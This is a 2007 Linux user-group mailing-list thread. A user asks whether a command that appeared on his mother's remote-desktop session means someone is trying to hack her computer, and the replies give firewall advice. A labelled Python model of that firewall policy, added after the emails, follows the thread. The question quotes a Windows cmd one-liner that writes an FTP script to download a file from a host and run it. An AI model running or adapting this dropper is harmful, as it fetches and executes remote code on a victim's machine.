[Dclug] What's happening here? Is this a hacking attempt?

Mackenzie Morgan macoafi at gmail.com
Sat Mar 31 01:33:34 EDT 2007


I've heard as low as 8 minutes for a Windows computer to be compromised.

On 3/30/07, Mike Vore <mike at vorefamily.net> wrote:
>
> Arun Mallikarjunan wrote:
> > Hi again,
> >     I had mentioned before that my mom (she lives in Chennai, India) has been
> > using Ubuntu Edgy for about 8 months now without any issues. Last week
> > she wanted me to show her how to rip music off of CDs!! I asked her
> > to enable remote desktop and showed her how to use the extractor. Well,
> > the next day she came online and told me that somebody was trying to take
> > control of her computer. I told her that that's not possible. Then she
> > sent me this piece of code
> >
> > run %systemroot%\system32\cmd.exe
> >
> > cmd /c echo open oki 21 >> ik &echo user u2m6g k3bmt >> ik &echo binary
> >  >> ik &echo get asd >> ik &echo bye >>w ikh &fotp -n -v -s:ik &diels ik
> > &asd &exit
> >
> >
> > I was a little surprised at seeing these messages. They are certainly
> > related to Windows, which she doesn't use and I don't either.
> >
> > The next day when she came online she said that 82.212.50.201
> > was trying to take control and 5 minutes later
> > she said 221.169.189.177 was. I looked these IPs up at
> > http://www.ip-adress.com/ and they seem to be coming from Germany and
> > Taiwan. I made her turn off the remote desktop and she hasn't seen it
> > since.
> >
> > Here are my Q's:
> >
> > 1. How did they find her?
>
> They may not be attacking 'her', just an IP address.
>
> > 2. She doesn't leave the computer on. How are they finding her? She does have
> > a ddns script which updates dyndns.org. If that's the
> > case, how did they find out her dyndns name?
>
> Same answer. I once set up a school on their T1 Class-C (24-bit) network. I
> then watched the input to the firewall - within just minutes of going on the
> net there were about a dozen port-scans on each of the addresses in the
> class-C range. Anyone with nmap can start an address or port scan on just
> about any IP range.
>
> > 3. What can I do to check if they have gotten in?
>
> It would probably take more time to check than to wipe the disk clean and
> re-install.
>
> > 4. What can I do to stop them from getting in? I am going to install a
> > firewall; any particular one in mind? The problem is that I have to
> > install it and then I have to instruct her to open ports, which is why it
> > needs to be simple enough for her to understand.
>
> Install a firewall IMMEDIATELY. Unless/until she needs to act as a server
> there is almost no need for opening any port for inbound traffic. But if she
> does need something like SSH to access from her office, put it on a high
> port, and have the firewall not only do NAT but port forwarding. For instance,
> I have my inbound SSH on port XXXX and have the firewall/router translate it
> to my 'big iron' on port 22. Also set up incoming filtering to only allow
> your IP number (if you have a fixed one) or your ISP's subnet; for example, if
> you are using Verizon FiOS you may find that you are using numbers in the
> 71.245.xxx.yyy range. Setting the filter to 71.245/16 won't stop everyone,
> but it will keep anyone not on Verizon's net out. Set up all incoming services
> that you need - like remote desktop - to use high numbers and do port
> forwarding. Not a lot of help, but it will keep someone from using default
> settings.
>
> When I started using FiOS and allowed port 22 (SSH) through I had many
> connect attempts, but none after I used the high port number with
> port forwarding.
>
> NEVER put any unprotected computer directly on the net. I think the time
> for a virgin Windows system to become compromised is now under 20 minutes.
>
> That's my take on the situation, YMMV. Others may
>
>
>
> --
> Mike Vore
>     http://www.OhMyWoodness.com
>     http://mike.vorefamily.net/twr
> _______________________________________________
> Dclug mailing list
> Dclug at calypso.tux.org
> http://calypso.tux.org/cgi-bin/mailman/listinfo/dclug
>



-- 
Mackenzie Morgan
Linux User # 432169
Hey, type this in the terminal!  It's really fun!
apt-get moo
then try
aptitude moo
and
aptitude -v moo
just keep adding v's to that and watch it change
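As an added illustration of the inbound policy Mike describes above (default-deny inbound, one high port forwarded to SSH on the internal host, and only the ISP's subnet allowed to reach it), here is a small Python model of that firewall decision, checked against the connection attempts the thread mentions. This is example code written for this page, not something from the thread or from any firewall product; the external port (the thread elides it as XXXX) and the internal host address are constructed placeholders, while the 71.245.0.0/16 range and the two probing addresses come from the thread.

```python
"""Model of the inbound firewall policy described in the thread.

Added example, not from the mailing list. Port numbers and the internal
host address are constructed placeholders.
"""
import ipaddress

# Constructed placeholders: the thread elides the real external port as XXXX.
EXTERNAL_SSH_PORT = 22022          # stand-in for the "high port" XXXX
INTERNAL_HOST = "192.168.1.10"     # the 'big iron' behind the router
INTERNAL_SSH_PORT = 22

# From the thread: only the ISP's subnet (71.245/16) may reach the forwarded port.
ALLOWED_SOURCES = [ipaddress.ip_network("71.245.0.0/16")]


def decide(src_ip, dst_port):
    """Return (verdict, forward_target).

    verdict is 'forward' when the packet matches the single permitted
    service and its source is inside an allowed network; otherwise 'drop'.
    """
    src = ipaddress.ip_address(src_ip)
    if dst_port == EXTERNAL_SSH_PORT and any(src in net for net in ALLOWED_SOURCES):
        return "forward", f"{INTERNAL_HOST}:{INTERNAL_SSH_PORT}"
    # Default deny: every other inbound connection is dropped, including
    # remote desktop on its default port (5900) and SSH on 22, so scanners
    # probing default settings see nothing.
    return "drop", None


# Constructed sample log: the two addresses named in the thread probing the
# default VNC and SSH ports, a right-port/wrong-network attempt, and one
# legitimate connection from inside the ISP range.
SAMPLE_ATTEMPTS = [
    ("82.212.50.201", 5900),    # probe seen in the thread, VNC default port
    ("221.169.189.177", 5900),  # second probe seen in the thread
    ("82.212.50.201", 22),      # default SSH port: nothing is forwarded there
    ("10.99.99.99", 22022),     # right port, but outside the allowed subnet
    ("71.245.12.34", 22022),    # office connection inside the ISP range
]


def apply_policy(attempts=SAMPLE_ATTEMPTS):
    """Run every attempt through decide() and return (ip, port, verdict, target)."""
    return [(ip, port) + decide(ip, port) for ip, port in attempts]


if __name__ == "__main__":
    for ip, port, verdict, target in apply_policy():
        print(f"{ip:>16}:{port:<6} {verdict:<8} {target or ''}")
```

Only the last attempt is forwarded; the four probes are dropped without any service answering, which is the "almost no need for opening any port for inbound traffic" posture Mike recommends. Moving the forwarded port off 22 does not stop a full port scan, as he notes; the source-subnet filter is what actually excludes hosts outside the ISP's range.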
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://calypso.tux.org/pipermail/dclug/attachments/20070331/615c07f1/attachment-0003.html 